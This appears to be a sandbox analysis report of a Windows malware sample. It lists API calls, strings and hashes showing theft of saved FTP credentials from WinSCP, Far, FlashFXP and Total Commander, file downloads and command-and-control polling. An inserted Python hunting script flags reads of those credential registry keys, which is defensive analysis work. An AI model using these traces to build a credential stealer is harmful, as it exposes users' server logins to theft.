                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: HeapOpen$AllocateCloseEnumFree
                  • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                  • API String ID: 755471147-4007225339
                  • Opcode ID: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                  • Opcode Fuzzy Hash: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C20,?), ref: 00404542
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                  • RegCloseKey.ADVAPI32(?), ref: 0040476D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: AllocateCloseEnumHeapOpen
                  • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                  • API String ID: 3847610418-285550827
                  • Opcode ID: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                  • Opcode Fuzzy Hash: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
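The registry keys opened in the records above (`SOFTWARE\Ghisler\Total Commander` under HKLM, `SOFTWARE\Far\Plugins\ftp\hosts` and `SOFTWARE\Far2\Plugins\ftp\hosts` under HKCU, and `SOFTWARE\martin prikryl\winscp 2\sessions` under HKCU) form a compact hunting list: any process other than the owning client reading them is worth a look. The following is an added example, not part of the report or of any vendor tooling. It evaluates constructed registry-access events in a simplified record shape (`image`, `pid`, `target`, with user-hive paths in the SID-prefixed `HKU\S-1-5-...` form); that shape, and the choice of totalcmd.exe/totalcmd64.exe, far.exe and winscp.exe as the legitimate owners, are assumptions you would adapt to your telemetry. Note that Sysmon's registry events (12, 13, 14) cover create, delete, value-set and rename only, so reads like the RegOpenKeyExW/RegQueryValueExW calls here need object-access auditing (event 4663 with a SACL on these keys) or EDR registry telemetry.

```python
import ntpath

# Registry paths the records above open (hive prefix omitted, matched
# case-insensitively), each with the client binaries assumed to own them.
CREDENTIAL_STORES = {
    r"SOFTWARE\Ghisler\Total Commander": {"totalcmd.exe", "totalcmd64.exe"},
    r"SOFTWARE\Far\Plugins\ftp\hosts": {"far.exe"},
    r"SOFTWARE\Far2\Plugins\ftp\hosts": {"far.exe"},
    r"SOFTWARE\martin prikryl\winscp 2\sessions": {"winscp.exe"},
}

HIVES = {"HKLM", "HKEY_LOCAL_MACHINE", "HKU", "HKEY_USERS",
         "HKCU", "HKEY_CURRENT_USER"}


def normalize_key(target):
    """Drop the hive and, for user hives, the SID component, then lower-case,
    so HKU\\S-1-5-21-...\\SOFTWARE\\X and HKLM\\SOFTWARE\\X both compare as
    software\\x."""
    parts = target.replace("/", "\\").split("\\")
    if parts and parts[0].upper() in HIVES:
        parts = parts[1:]
        if parts and parts[0].upper().startswith("S-1-5-"):
            parts = parts[1:]
    return "\\".join(parts).lower()


def classify(event):
    """Return (store, reason) when a process other than the owning client
    touches a known FTP credential store, otherwise None."""
    key = normalize_key(event["target"])
    image = ntpath.basename(event["image"]).lower()
    for store, owners in CREDENTIAL_STORES.items():
        s = store.lower()
        if key == s or key.startswith(s + "\\"):
            if image in owners:
                return None
            return store, f"{image} (pid {event['pid']}) read {event['target']}"
    return None


def hunt(events):
    """Apply classify() to a stream of events and keep the hits."""
    return [hit for hit in map(classify, events) if hit is not None]


# Constructed registry-access events in the assumed simplified shape.
# Paths, SIDs and PIDs are placeholders, not data from the report.
SAMPLE_EVENTS = [
    {"pid": 4242, "image": r"C:\Users\user\AppData\Roaming\sample.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\martin prikryl\winscp 2\sessions\prod"},
    {"pid": 4242, "image": r"C:\Users\user\AppData\Roaming\sample.exe",
     "target": r"HKLM\SOFTWARE\Ghisler\Total Commander"},
    {"pid": 4242, "image": r"C:\Users\user\AppData\Roaming\sample.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Far2\Plugins\ftp\hosts\myserver"},
    {"pid": 4120, "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\martin prikryl\winscp 2\sessions\prod"},
    {"pid": 5001, "image": r"C:\Windows\explorer.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for store, reason in hunt(SAMPLE_EVENTS):
        print(f"[{store}] {reason}")
```

The owner allow-list is deliberately by image name only; in production you would key it on signer or hash, since a dropper named winscp.exe would otherwise pass.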
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript$+@
                  • API String ID: 1987340527-3375436608
                  • Opcode ID: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                  APIs
                  • DeleteFileW.KERNEL32(?,74DF0F00), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32(00000000), ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00000626), ref: 00404888
                  • StrStrIA.SHLWAPI(?,?), ref: 00404913
                  • StrStrIA.SHLWAPI(?,?), ref: 00404925
                  • StrStrIA.SHLWAPI(?,?), ref: 00404935
                  • StrStrIA.SHLWAPI(?,?), ref: 00404947
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Find$FilePath$AllocateCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                  • API String ID: 2372625535-1322549247
                  • Opcode ID: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                  • Opcode Fuzzy Hash: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-2333287219
                  • Opcode ID: 82b565c318c92811cc1fcd7c997887a6c1db696be048d29a5dc49aae136dd5e0
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: 82b565c318c92811cc1fcd7c997887a6c1db696be048d29a5dc49aae136dd5e0
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                  APIs
                  • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: ClearVariant
                  • String ID: _self$http$+@
                  • API String ID: 1473721057-3317424838
                  • Opcode ID: b29b04af0fd8df783a00e80cdbcc61c315534eae5082a51d3f3564c248de0ad6
                  • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                  • Opcode Fuzzy Hash: b29b04af0fd8df783a00e80cdbcc61c315534eae5082a51d3f3564c248de0ad6
                  • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                  • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                  • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2141107913-3455059086
                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  • Opcode ID: 4339e3f0dc457da50394cd639dc8395ed51e96cf63b790a54362bff983af086b
                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                  • Opcode Fuzzy Hash: 4339e3f0dc457da50394cd639dc8395ed51e96cf63b790a54362bff983af086b
                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID:
                  • String ID: http$+@
                  • API String ID: 0-4127549746
                  • Opcode ID: 789a0b4113426d536a6dbd70ac3fa36f55536d61627c7eef1083e5a0f6da7bd5
                  • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                  • Opcode Fuzzy Hash: 789a0b4113426d536a6dbd70ac3fa36f55536d61627c7eef1083e5a0f6da7bd5
                  • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: EnvironmentExpandFolderOpenPathStrings
                  • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                  • API String ID: 1994525040-4055253781
                  • Opcode ID: 2c9c97cb0e4b331afd6807a12706ed177aa93df05a890f4fa4eae1323a9dc38e
                  • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                  • Opcode Fuzzy Hash: 2c9c97cb0e4b331afd6807a12706ed177aa93df05a890f4fa4eae1323a9dc38e
                  • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  • Opcode ID: 0b84c150fe79eef348fa232134a2979da5830d61bcf949a9e3eece6736197f63
                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                  • Opcode Fuzzy Hash: 0b84c150fe79eef348fa232134a2979da5830d61bcf949a9e3eece6736197f63
                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                  APIs
                  • SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
                  • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: a1e4566dcb42a438b782de8cbc71f50032a5fd76516fde8aebe09c3aff29a3de
                  • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                  • Opcode Fuzzy Hash: a1e4566dcb42a438b782de8cbc71f50032a5fd76516fde8aebe09c3aff29a3de
                  • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  • API String ID: 362191241-2593661552
                  • Opcode ID: 4cb1df8bb0b87fba6aedb2e3e66e79cfad31cdc84dcae41a1e38891fc59b1e3a
                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                  • Opcode Fuzzy Hash: 4cb1df8bb0b87fba6aedb2e3e66e79cfad31cdc84dcae41a1e38891fc59b1e3a
                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  • API String ID: 876702719-0
                  • Opcode ID: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                  • Opcode Fuzzy Hash: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004088E4
                  • SysFreeString.OLEAUT32(?), ref: 004088E9
                  • SysFreeString.OLEAUT32(?), ref: 004089D3
                  • SysFreeString.OLEAUT32(?), ref: 004089D8
                  • SysFreeString.OLEAUT32(?), ref: 004089F3
                  Strings
                  Memory Dump Source
